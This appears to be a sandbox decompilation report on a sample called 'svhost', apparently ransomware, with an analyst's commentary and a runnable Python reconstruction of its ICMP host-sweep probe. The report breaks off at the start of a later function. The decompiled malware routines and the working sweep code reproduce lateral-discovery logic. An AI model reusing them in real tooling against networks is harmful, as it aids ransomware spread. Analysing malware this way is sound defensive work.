                                      0x00e8ae13
                                      0x00e8ae13
                                      0x00e8ae19
                                      0x00e8ae1e
                                      0x00e8ae1f
                                      0x00e8ae20
                                      0x00e8ae23
                                      0x00e8ae26
                                      0x00e8ae27
                                      0x00e8ae29
                                      0x00e8ae32
                                      0x00e8ae35
                                      0x00e8ae38
                                      0x00e8ae3b
                                      0x00e8ae44
                                      0x00e8ae4f
                                      0x00e8ae55
                                      0x00e8ae57
                                      0x00e8ae5c
                                      0x00e8ad98
                                      0x00e8ad98
                                      0x00e8ad9c
                                      0x00e8ada2
                                      0x00e8adaa
                                      0x00e8adac
                                      0x00e8adb0
                                      0x00e8adb5
                                      0x00e8adb5
                                      0x00e8adba
                                      0x00000000
                                      0x00e8adbc
                                      0x00e8adbc
                                      0x00000000
                                      0x00e8adbf
                                      0x00e8adba
                                      0x00e8ad96
                                      0x00e8ad81
                                      0x00e8ad19
                                      0x00e8acbd
                                      0x00e8acbf
                                      0x00e8acc5
                                      0x00e8accd
                                      0x00e8acce
                                      0x00e8accf
                                      0x00e8acdd
                                      0x00e8acdd

                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00ED268B,00ED268D,00000000,00000000,221CAC15,?,?,?,00ED268B,00000000,?,00E6F338,00ED268B,0000000C), ref: 00E8AD0C
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00ED268B,?,00000000,00000000,?,00ED268B,00000000,?,00E6F338,00ED268B), ref: 00E8AD8E
                                      • SysAllocString.OLEAUT32(00000000), ref: 00E8AD9C
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharMultiWide$AllocString
                                      • String ID:
                                      • API String ID: 262959230-0
                                      • Opcode ID: c92480e892037f4d00f0b2e517b6adc2e03a1986c07a00f557a1ee9cc36f7a71
                                      • Instruction ID: bb717c5b23d2354adf2e60d75b9a4380c16271c0fc7d5dc2a0f43ad5b36b3f43
                                      • Opcode Fuzzy Hash: c92480e892037f4d00f0b2e517b6adc2e03a1986c07a00f557a1ee9cc36f7a71
                                      • Instruction Fuzzy Hash: A34119B1A00209AFE700AF65D845BEEB7F8EB48714F14913AF51DF7280D735A90187A2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 94%
                                      			E00E56F00(void* __ebx, signed int __ecx, void* __edi, void* __esi, signed int _a4, signed char _a8, intOrPtr _a16) {
                                      				char _v8;
                                      				char _v16;
                                      				signed int _v20;
                                      				char _v24;
                                      				signed int _v28;
                                      				char _v29;
                                      				char _v30;
                                      				char _v36;
                                      				intOrPtr _v40;
                                      				char _v44;
                                      				char _v84;
                                      				signed int _t56;
                                      				signed int _t57;
                                      				signed char _t62;
                                      				signed char _t66;
                                      				signed char _t67;
                                      				signed char _t69;
                                      				signed char _t80;
                                      				void* _t87;
                                      				void* _t123;
                                      				void* _t124;
                                      				signed int _t125;
                                      
                                      				_t124 = __esi;
                                      				_t123 = __edi;
                                      				_t87 = __ebx;
                                      				_push(0xffffffff);
                                      				_push(0xec0560);
                                      				_push( *[fs:0x0]);
                                      				_t56 =  *0xeef074; // 0x221cac15
                                      				_t57 = _t56 ^ _t125;
                                      				_v20 = _t57;
                                      				_push(_t57);
                                      				 *[fs:0x0] =  &_v16;
                                      				_v28 = __ecx;
                                      				_v36 = 0;
                                      				E00E57780( &_v24, _v28 + 0x14);
                                      				_v8 = 0;
                                      				if((_a8 & 0x000000ff) == 0) {
                                      					_t62 = E00E54620(_v28);
                                      					__eflags = _t62 & 0x000000ff;
                                      					if((_t62 & 0x000000ff) != 0) {
                                      						L8:
                                      						_v30 = 0;
                                      						_v8 = 0xffffffff;
                                      						E00E57740();
                                      						L23:
                                      						 *[fs:0x0] = _v16;
                                      						return E00E89A35(_t87, _v20 ^ _t125, _t122, _t123, _t124);
                                      					}
                                      					_t66 = E00E54650(_v28);
                                      					_t122 = _t66 & 0x000000ff;
                                      					__eflags = _t66 & 0x000000ff;
                                      					if((_t66 & 0x000000ff) != 0) {
                                      						goto L8;
                                      					}
                                      					_t67 = E00E545F0(_v28);
                                      					__eflags = _t67 & 0x000000ff;
                                      					if((_t67 & 0x000000ff) == 0) {
                                      						L9:
                                      						_t122 = _a4 & 0x000000ff;
                                      						__eflags = _a4 & 0x000000ff;
                                      						if((_a4 & 0x000000ff) == 0) {
                                      							_t69 = E00E545C0(_v28);
                                      							__eflags = _t69 & 0x000000ff;
                                      							if((_t69 & 0x000000ff) != 0) {
                                      								_v36 = 2;
                                      							}
                                      							_t122 = _v28;
                                      							 *((intOrPtr*)(_v28 + 4)) = 2;
                                      							__eflags = _v28 + 0xc8;
                                      							E00E7182A(_t69);
                                      						} else {
                                      							 *((intOrPtr*)(_v28 + 4)) = 4;
                                      							_v36 = 1;
                                      						}
                                      						_v8 = 0xffffffff;
                                      						E00E57740();
                                      						_v40 = _v36;
                                      						__eflags = _v40 - 1;
                                      						if(_v40 == 1) {
                                      							E00E534F0(_v28 + 0x50);
                                      							_t122 = _v28;
                                      							__eflags =  *(_t122 + 0x44);
                                      							if( *(_t122 + 0x44) != 0) {
                                      								E00E5ABA0( *((intOrPtr*)(E00E53840( &_v44, _v28))));
                                      								_v8 = 1;
                                      								_t122 =  &_v84;
                                      								E00E53910(_t87,  &_v84,  &_v84, _t123, _t124, __eflags,  &_v84, 0x10);
                                      								_v8 = 0xffffffff;
                                      								E00E538A0( &_v84);
                                      							}
                                      						} else {
                                      							__eflags = _v40 - 2;
                                      							if(__eflags == 0) {
                                      								_t80 = E00E58A10(_v28 + 0xd8, __eflags);
                                      								__eflags = _t80 & 0x000000ff;
                                      								if((_t80 & 0x000000ff) != 0) {
                                      									__eflags = _v28 + 0xd8;
                                      									_t80 = E00E57360(_v28 + 0xd8, _v28 + 0xd8);
                                      								}
                                      								E00E516F0(_t80, _v28 + 0x50);
                                      							}
                                      						}
                                      						goto L23;
                                      					}
                                      					__eflags = _a4 & 0x000000ff;
                                      					if((_a4 & 0x000000ff) != 0) {
                                      						goto L9;
                                      					}
                                      					goto L8;
                                      				}
                                      				_t122 = _v28;
                                      				if( *((intOrPtr*)(_v28 + 4)) != 4) {
                                      					E00E588F0(_v28 + 0xc, __eflags, _a16);
                                      					goto L9;
                                      				} else {
                                      					_v29 = 0;
                                      					_v8 = 0xffffffff;
                                      					E00E57740();
                                      					goto L23;
                                      				}
                                      			}

                                      0x00e56f00
                                      0x00e56f00
                                      0x00e56f00
                                      0x00e56f03
                                      0x00e56f05
                                      0x00e56f10
                                      0x00e56f14
                                      0x00e56f19
                                      0x00e56f1b
                                      0x00e56f1e
                                      0x00e56f22
                                      0x00e56f28
                                      0x00e56f2b
                                      0x00e56f3c
                                      0x00e56f41
                                      0x00e56f4e
                                      0x00e56f8a
                                      0x00e56f92
                                      0x00e56f94
                                      0x00e56fbc
                                      0x00e56fbc
                                      0x00e56fc0
                                      0x00e56fca
                                      0x00e570c4
                                      0x00e570c7
                                      0x00e570dc
                                      0x00e570dc
                                      0x00e56f99
                                      0x00e56f9e
                                      0x00e56fa1
                                      0x00e56fa3
                                      0x00000000
                                      0x00000000
                                      0x00e56fa8
                                      0x00e56fb0
                                      0x00e56fb2
                                      0x00e56fd7
                                      0x00e56fd7
                                      0x00e56fdb
                                      0x00e56fdd
                                      0x00e56ff5
                                      0x00e56ffd
                                      0x00e56fff
                                      0x00e57001
                                      0x00e57001
                                      0x00e57008
                                      0x00e5700b
                                      0x00e57015
                                      0x00e5701b
                                      0x00e56fdf
                                      0x00e56fe2
                                      0x00e56fe9
                                      0x00e56fe9
                                      Instruction addresses for the decompiled lines above, in source order (the extraction dropped the side-by-side alignment with the code):
                                      0x00e57020 0x00e5702a 0x00e57032 0x00e57035 0x00e57039 0x00e57079 0x00e5707e 0x00e57081
                                      0x00e57085 0x00e57099 0x00e5709e 0x00e570a7 0x00e570ab 0x00e570b3 0x00e570bd 0x00e570bd
                                      0x00e5703b 0x00e5703b 0x00e5703f 0x00e5704c 0x00e57054 0x00e57056 0x00e5705b 0x00e57061
                                      0x00e57061 0x00e5706c 0x00e5706c 0x00e5703f 0x00000000 0x00e570c2 0x00e56fb8 0x00e56fba
                                      0x00000000 0x00000000 0x00000000 0x00e56fba 0x00e56f50 0x00e56f57 0x00e56f80 0x00000000
                                      0x00e56f59 0x00e56f59 0x00e56f5d 0x00e56f67 0x00000000 0x00e56f6c

                                      APIs
                                      • Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::_Scoped_lock.LIBCMTD ref: 00E56F3C
                                      • SafeRWList.LIBCONCRTD ref: 00E56F67
                                      • shared_ptr.LIBCMTD ref: 00E56F80
                                      • Concurrency::details::_Task_impl_base::_IsCompleted.LIBCPMTD ref: 00E56F8A
                                      • Concurrency::details::_Task_impl_base::_IsCanceled.LIBCPMTD ref: 00E56F99
                                      • Concurrency::details::_Task_impl_base::_IsPendingCancel.LIBCPMTD ref: 00E56FA8
                                      • SafeRWList.LIBCONCRTD ref: 00E56FCA
                                      • SafeRWList.LIBCONCRTD ref: 00E5702A
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Concurrency::details::_$ListSafeTask_impl_base::_$CancelCanceledCompletedCriticalLock::_PendingReentrantScoped_lockScoped_lock::_shared_ptr
                                      • String ID:
                                      • API String ID: 1003843333-0
                                      • Opcode ID: 3fbd065f7aca134a32c3f5392929dd7d91616be0a37045f2bae7be901052b193
                                      • Instruction ID: 095534f7e147b61456222d17425a5522381539dd7e5e28bb7ed72e0713584725
                                      • Opcode Fuzzy Hash: 3fbd065f7aca134a32c3f5392929dd7d91616be0a37045f2bae7be901052b193
                                      • Instruction Fuzzy Hash: 1F5171B0A041498BCF08DF94D452BFEBBB1BF4030AF44595DE9527B2C2DB359948DBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 79%
                                      			E00E569E0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, signed char _a4) {
                                      				intOrPtr _v8;
                                      				char _v16;
                                      				signed int _v20;
                                      				char _v28;
                                      				intOrPtr _v32;
                                      				intOrPtr _v36;
                                      				intOrPtr _v40;
                                      				intOrPtr _v44;
                                      				char _v52;
                                      				void* __ebp;
                                      				signed int _t34;
                                      				signed int _t35;
                                      				signed char _t44;
                                      				void* _t58;
                                      				void* _t60;
                                      				intOrPtr _t87;
                                      				void* _t88;
                                      				void* _t89;
                                      				signed int _t90;
                                      				void* _t91;
                                      				intOrPtr _t92;
                                      
                                      				_t89 = __esi;
                                      				_t88 = __edi;
                                      				_t60 = __ebx;
                                      				_push(0xffffffff);
                                      				_push(0xec04b8);
                                      				_push( *[fs:0x0]);
                                      				_t92 = _t91 - 0x24;
                                      				_t34 =  *0xeef074; // 0x221cac15
                                      				_t35 = _t34 ^ _t90;
                                      				_v20 = _t35;
                                      				_push(_t35);
                                      				 *[fs:0x0] =  &_v16;
                                      				_v32 = __ecx;
                                      				E00E515C0( &_v28, 8);
                                      				E00E57830( &_v28, _v32 + 0x14);
                                      				_v8 = 0;
                                      				if((_a4 & 0x000000ff) != 0) {
                                      					_t87 = _v32;
                                      					_t95 =  *(_t87 + 0x6c) & 0x000000ff;
                                      					if(( *(_t87 + 0x6c) & 0x000000ff) != 0) {
                                      						_t58 = E00E54E90( &_v52, _t95,  &_v52, 2);
                                      						_t92 = _t92 + 8;
                                      						E00E724A0(_t95, _t58);
                                      					}
                                      				}
                                      				if((E00E514D0() & 0x000000ff) != 0) {
                                      					_t92 = _t92 - 8;
                                      					_v40 = _t92;
                                      					E00E51430(_v32 + 0xc);
                                      					E00E7247D(_v32 + 0xc);
                                      				}
                                      				 *((char*)(_v32 + 0x6c)) = 1;
                                      				E00E58510(_v32,  &_v28);
                                      				while( *((intOrPtr*)(_v32 + 0x70)) == 0) {
                                      					E00E522B0(_v32 + 0x44,  &_v28);
                                      				}
                                      				_t44 = E00E514D0();
                                      				_t86 = _t44 & 0x000000ff;
                                      				__eflags = _t44 & 0x000000ff;
                                      				if((_t44 & 0x000000ff) != 0) {
                                      					_v44 = _t92 - 8;
                                      					__eflags = _v32 + 0xc;
                                      					E00E51430(_v32 + 0xc);
                                      					E00E7247D(__eflags);
                                      				}
                                      				_v36 = _v32 + 8;
                                      				_v8 = 0xffffffff;
                                      				E00E577E0();
                                      				 *[fs:0x0] = _v16;
                                      				__eflags = _v20 ^ _t90;
                                      				return E00E89A35(_t60, _v20 ^ _t90, _t86, _t88, _t89);
                                      			}

                                      Instruction addresses for the decompiled lines above, in source order (the extraction dropped the side-by-side alignment with the code):
                                      0x00e569e0 0x00e569e0 0x00e569e0 0x00e569e3 0x00e569e5 0x00e569f0 0x00e569f1 0x00e569f4
                                      0x00e569f9 0x00e569fb 0x00e569fe 0x00e56a02 0x00e56a08 0x00e56a10 0x00e56a1f 0x00e56a24
                                      0x00e56a31 0x00e56a33 0x00e56a3a 0x00e56a3c 0x00e56a44 0x00e56a49 0x00e56a4d 0x00e56a4d
                                      0x00e56a3c 0x00e56a62 0x00e56a64 0x00e56a69 0x00e56a73 0x00e56a78 0x00e56a78 0x00e56a80
                                      0x00e56a8b 0x00e56a90 0x00e56aa3 0x00e56aa3 0x00e56ab0 0x00e56ab5 0x00e56ab8 0x00e56aba
                                      0x00e56ac1 0x00e56ac7 0x00e56acb 0x00e56ad0 0x00e56ad0 0x00e56adb 0x00e56ade 0x00e56ae8
                                      0x00e56af3 0x00e56afe 0x00e56b08

                                      APIs
                                      • unique_lock.LIBCONCRTD ref: 00E56A1F
                                      • std::make_error_code.LIBCPMTD ref: 00E56A44
                                        • Part of subcall function 00E54E90: std::generic_category.LIBCPMTD ref: 00E54E93
                                        • Part of subcall function 00E54E90: _Smanip.LIBCPMTD ref: 00E54EA0
                                        • Part of subcall function 00E724A0: std::future_error::future_error.LIBCPMT ref: 00E724B1
                                        • Part of subcall function 00E724A0: __CxxThrowException@8.LIBVCRUNTIME ref: 00E724BF
                                      • std::exception_ptr::~exception_ptr.LIBCONCRTD ref: 00E56A58
                                      • std::exception_ptr::exception_ptr.LIBCONCRTD ref: 00E56A73
                                      • std::_Rethrow_future_exception.LIBCPMT ref: 00E56A78
                                      • std::exception_ptr::~exception_ptr.LIBCONCRTD ref: 00E56AB0
                                      • std::exception_ptr::exception_ptr.LIBCONCRTD ref: 00E56ACB
                                      • std::_Rethrow_future_exception.LIBCPMT ref: 00E56AD0
                                      • ~unique_lock.LIBCONCRTD ref: 00E56AE8
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Rethrow_future_exceptionstd::_std::exception_ptr::exception_ptrstd::exception_ptr::~exception_ptr$Exception@8SmanipThrowstd::future_error::future_errorstd::generic_categorystd::make_error_codeunique_lock~unique_lock
                                      • String ID:
                                      • API String ID: 685526741-0
                                      • Opcode ID: 3209ffb9e8b1ea57d6f7617b8bba1289ac5a9048539e70f7133c585adec8aaac
                                      • Instruction ID: aa0e5e0e691a63357fec7cb0c4209f9d36a4fcf5b326d4fa24bbb50f71cd31e6
                                      • Opcode Fuzzy Hash: 3209ffb9e8b1ea57d6f7617b8bba1289ac5a9048539e70f7133c585adec8aaac
                                      • Instruction Fuzzy Hash: B2314171D042099BCF08EBA8D852BBFB7F5BF44305F44955DE92277282EB349909CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 49%
                                      			E00E6DB40(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, char _a4, intOrPtr _a8) {
                                      				signed int _v8;
                                      				char _v9;
                                      				char _v10;
                                      				char _v36;
                                      				char _v37;
                                      				intOrPtr _v44;
                                      				char _v45;
                                      				intOrPtr _v52;
                                      				intOrPtr _v56;
                                      				intOrPtr _v60;
                                      				char _v64;
                                      				intOrPtr _v68;
                                      				intOrPtr _v72;
                                      				signed int _t38;
                                      				signed char _t41;
                                      				intOrPtr _t49;
                                      				intOrPtr _t53;
                                      				signed int _t79;
                                      
                                      				_t78 = __esi;
                                      				_t77 = __edi;
                                      				_t58 = __ebx;
                                      				_t38 =  *0xeef074; // 0x221cac15
                                      				_v8 = _t38 ^ _t79;
                                      				_v72 = __ecx;
                                      				_v45 = 0;
                                      				_t41 = E00E579A0(_a4);
                                      				_t84 = _t41 & 0x000000ff;
                                      				if((_t41 & 0x000000ff) != 0) {
                                      					L11:
                                      					__eflags = 0;
                                      				} else {
                                      					_t74 = _a4;
                                      					E00E6DC80(__ebx,  &_v10, _a4, __edi, __esi, _t84,  &_v36, E00E51650(_a4));
                                      					if((E00E579A0( &_v36) & 0x000000ff) != 0) {
                                      						L10:
                                      						E00E57F50( &_v36);
                                      						goto L11;
                                      					} else {
                                      						_t49 = E00E57E90();
                                      						__imp__#11(_t49);
                                      						_v60 = _t49;
                                      						if(_v60 == 0xffffffff) {
                                      							goto L10;
                                      						} else {
                                      							__imp__IcmpCreateFile();
                                      							_v44 = _t49;
                                      							if(_v44 == 0xffffffff) {
                                      								goto L10;
                                      							} else {
                                      								_t74 =  *0xed268a; // 0x0
                                      								_v9 = _t74;
                                      								_v56 = 0x1d;
                                      								_push(_v56);
                                      								_v52 = E00EA49B4();
                                      								if(_v52 == 0) {
                                      									__imp__IcmpCloseHandle(_v44);
                                      									goto L10;
                                      								} else {
                                      									_t53 = _v44;
                                      									__imp__IcmpSendEcho(_t53, _v60,  &_v9, 1, 0, _v52, _v56, _a8);
                                      									_v68 = _t53;
                                      									__imp__IcmpCloseHandle(_v44);
                                      									_t74 = _v52;
                                      									E00EA478C(_v52);
                                      									if(_v68 == 0) {
                                      										_v64 = 0;
                                      									} else {
                                      										_v64 = 1;
                                      									}
                                      									_v37 = _v64;
                                      									E00E57F50( &_v36);
                                      								}
                                      							}
                                      						}
                                      					}
                                      				}
                                      				return E00E89A35(_t58, _v8 ^ _t79, _t74, _t77, _t78);
                                      			}

                                      Instruction addresses for the decompiled lines above, in source order (the extraction dropped the side-by-side alignment with the code):
                                      0x00e6db40 0x00e6db40 0x00e6db40 0x00e6db46 0x00e6db4d 0x00e6db50 0x00e6db55 0x00e6db5b
                                      0x00e6db63 0x00e6db65 0x00e6dc61 0x00e6dc61 0x00e6db6b 0x00e6db6b 0x00e6db7f 0x00e6db91
                                      0x00e6dc59 0x00e6dc5c 0x00000000 0x00e6db97 0x00e6db9a 0x00e6dba0 0x00e6dba6 0x00e6dbad
                                      0x00000000 0x00e6dbb3 0x00e6dbb3 0x00e6dbb9 0x00e6dbc0 0x00000000 0x00e6dbc6 0x00e6dbc6
                                      0x00e6dbcc 0x00e6dbcf 0x00e6dbd9 0x00e6dbe2 0x00e6dbe9 0x00e6dc53 0x00000000 0x00e6dbeb
                                      0x00e6dc03 0x00e6dc07 0x00e6dc0d 0x00e6dc14 0x00e6dc1a 0x00e6dc1e 0x00e6dc2a 0x00e6dc35
                                      0x00e6dc2c 0x00e6dc2c 0x00e6dc2c 0x00e6dc3f 0x00e6dc45 0x00e6dc4a 0x00e6dbe9 0x00e6dbc0
                                      0x00e6dbad 0x00e6db91 0x00e6dc70

                                      APIs
                                      • std::ios_base::good.LIBCPMTD ref: 00E6DB5B
                                        • Part of subcall function 00E6DC80: task.LIBCPMTD ref: 00E6DCE2
                                      • std::ios_base::good.LIBCPMTD ref: 00E6DB87
                                      • inet_addr.WS2_32(00000000), ref: 00E6DBA0
                                      • IcmpCreateFile.IPHLPAPI ref: 00E6DBB3
                                      • IcmpSendEcho.IPHLPAPI(000000FF,000000FF,?,00000001,00000000,00000000,0000001D,?), ref: 00E6DC07
                                      • IcmpCloseHandle.IPHLPAPI(000000FF), ref: 00E6DC14
                                        • Part of subcall function 00EA478C: _free.LIBCMT ref: 00EA479F
                                      • task.LIBCPMTD ref: 00E6DC45
                                      • IcmpCloseHandle.IPHLPAPI(000000FF), ref: 00E6DC53
                                      • task.LIBCPMTD ref: 00E6DC5C
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Icmp$task$CloseHandlestd::ios_base::good$CreateEchoFileSend_freeinet_addr
                                      • String ID:
                                      • API String ID: 2824824022-0
                                      • Opcode ID: 87a74e717531f42ed9ba6a134994156ea0d682d5566056ce5242448c7483ba86
                                      • Instruction ID: 14261152e66f8641f66691c9bdbf90b246620a80dcdfb14014e2a9d2cc746b6c
                                      • Opcode Fuzzy Hash: 87a74e717531f42ed9ba6a134994156ea0d682d5566056ce5242448c7483ba86
                                      • Instruction Fuzzy Hash: 19315EB1D04208AFCF04EFA4E895AEEBBB4AF58300F441129F546B7291DB719909DB61
                                      Uniqueness

                                      Uniqueness Score: -1.00%
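
The function above (E00E6DB40) is the sample's host-liveness probe, the step that precedes touching a remote host's shares: it reads a target string from a stream, converts it with inet_addr, opens an ICMP handle with IcmpCreateFile, allocates a 0x1d-byte reply buffer, sends one echo request with a 1-byte payload through IcmpSendEcho using the caller-supplied timeout (_a8), closes the handle, frees the buffer and reports true exactly when IcmpSendEcho returned a non-zero reply count. Every failure path returns false: inet_addr yielding INADDR_NONE (the 0xffffffff compare at the first branch), IcmpCreateFile yielding INVALID_HANDLE_VALUE (the second 0xffffffff compare), or the allocation failing, in which case the handle is closed before returning. The Python below is an analyst's reconstruction of that control flow, added for this report; it is not code from the sample, from its author, or from Joe Sandbox. The backend abstraction, the FakeIcmp stand-in, the WindowsIcmp wrapper and the names inet_addr, probe_host and sweep are my own; the constants (1-byte payload, 0x1d reply size, INADDR_NONE) are the ones visible in the decompilation, and the Windows backend issues the same three IPHLPAPI calls. The sweep helper additionally reproduces the scan-once check that E00E558E0 logs as "[LOCKER] Already Scan" (the loop over 0x20-byte entries compared against _a4):

```python
"""Analyst reconstruction of the ICMP host-liveness probe decompiled above (E00E6DB40).
Added example, not code from the sample or Joe Sandbox; names are the analyst's own."""
import ctypes
import ipaddress
from typing import Dict, List, Optional

# From the decompiled function: a 1-byte request payload (_v9, copied from a
# zeroed global) and a 0x1d-byte reply buffer (_v56): the 28-byte 32-bit
# ICMP_ECHO_REPLY header plus the single echoed payload byte.
REQUEST_DATA = b"\x00"
REPLY_BUFFER_SIZE = 0x1D
INADDR_NONE = b"\xff\xff\xff\xff"  # inet_addr failure value, 0xffffffff in the decompilation


def inet_addr(text: str) -> Optional[bytes]:
    """WS2_32!inet_addr as the sample uses it: four network-order bytes, or None for
    INADDR_NONE.  Simplification (assumption): strict dotted quads only; the real API
    also takes short forms such as '10.1'.  255.255.255.255 is INADDR_NONE, as in the API."""
    try:
        packed = ipaddress.IPv4Address(text.strip()).packed
    except ValueError:
        return None
    return None if packed == INADDR_NONE else packed


# Backend = the three IPHLPAPI calls the sample makes: create_file() -> handle or None
# (INVALID_HANDLE_VALUE); send_echo(handle, dest, timeout_ms) -> reply count; close_handle(handle).
class FakeIcmp:
    """Constructed offline stand-in: responding hosts plus the set of open handles."""
    def __init__(self, responders: Dict[str, int], fail_create: bool = False):
        self.responders = {ipaddress.IPv4Address(k).packed: n for k, n in responders.items()}
        self.fail_create = fail_create
        self.open_handles = set()
        self._next = 1

    def create_file(self) -> Optional[int]:
        if self.fail_create:
            return None
        handle, self._next = self._next, self._next + 1
        self.open_handles.add(handle)
        return handle

    def send_echo(self, handle: int, dest: bytes, timeout_ms: int) -> int:
        return self.responders.get(dest, 0) if handle in self.open_handles else 0

    def close_handle(self, handle: int) -> None:
        self.open_handles.remove(handle)


class WindowsIcmp:
    """Real backend, same IPHLPAPI calls as the sample; Windows only, not run by the test."""
    def __init__(self) -> None:
        self.api = api = ctypes.WinDLL("iphlpapi")
        api.IcmpCreateFile.restype = ctypes.c_void_p
        api.IcmpSendEcho.argtypes = [ctypes.c_void_p, ctypes.c_ulong, ctypes.c_void_p, ctypes.c_ushort,
                                     ctypes.c_void_p, ctypes.c_void_p, ctypes.c_ulong, ctypes.c_ulong]
        api.IcmpSendEcho.restype = ctypes.c_ulong
        api.IcmpCloseHandle.argtypes = [ctypes.c_void_p]

    def create_file(self) -> Optional[int]:
        handle = self.api.IcmpCreateFile()
        return None if handle in (None, ctypes.c_void_p(-1).value) else handle  # INVALID_HANDLE_VALUE

    def send_echo(self, handle: int, dest: bytes, timeout_ms: int) -> int:
        reply = ctypes.create_string_buffer(REPLY_BUFFER_SIZE)
        # IPAddr is inet_addr's network-order ULONG: on x86 the four bytes read little-endian.
        return self.api.IcmpSendEcho(handle, int.from_bytes(dest, "little"), REQUEST_DATA,
                                     len(REQUEST_DATA), None, reply, REPLY_BUFFER_SIZE, timeout_ms)

    def close_handle(self, handle: int) -> None:
        self.api.IcmpCloseHandle(handle)


def probe_host(target: str, timeout_ms: int, icmp) -> bool:
    """Decision sequence of E00E6DB40: bad address -> False, no ICMP handle -> False,
    else one echo request; True iff a reply came back.  Handle closed on every path."""
    dest = inet_addr(target)
    if dest is None:
        return False
    handle = icmp.create_file()
    if handle is None:
        return False
    try:
        replies = icmp.send_echo(handle, dest, timeout_ms)
    finally:
        icmp.close_handle(handle)
    return replies != 0


def sweep(targets: List[str], timeout_ms: int, icmp) -> List[str]:
    """Probe each target once (the scan-once check E00E558E0 logs as
    '[LOCKER] Already Scan') and return the hosts that answered."""
    seen, alive = set(), []
    for target in targets:
        if target in seen:
            continue
        seen.add(target)
        if probe_host(target, timeout_ms, icmp):
            alive.append(target)
    return alive
```

Two details matter when reading the sample's scan results. The decision is purely `reply count != 0`; ICMP_ECHO_REPLY.Status is never inspected, and IcmpSendEcho can return a reply whose Status is an ICMP error rather than an echo reply, so such a reply can be counted as a live host. The reply buffer is exactly sizeof(ICMP_ECHO_REPLY) plus the one payload byte, with none of the 8 extra bytes the IcmpSendEcho documentation asks for to hold an ICMP error message. Because inet_addr maps 255.255.255.255 to INADDR_NONE, the limited-broadcast address is never probed, so a single sweep of a host list is the only discovery this function supports.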

                                      C-Code - Quality: 91%
                                      			E00E558E0(void* __ebx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4, char _a8, char _a12, signed int _a16) {
                                      				char _v16;
                                      				signed int _v20;
                                      				char _v24;
                                      				void* _v32;
                                      				char _v56;
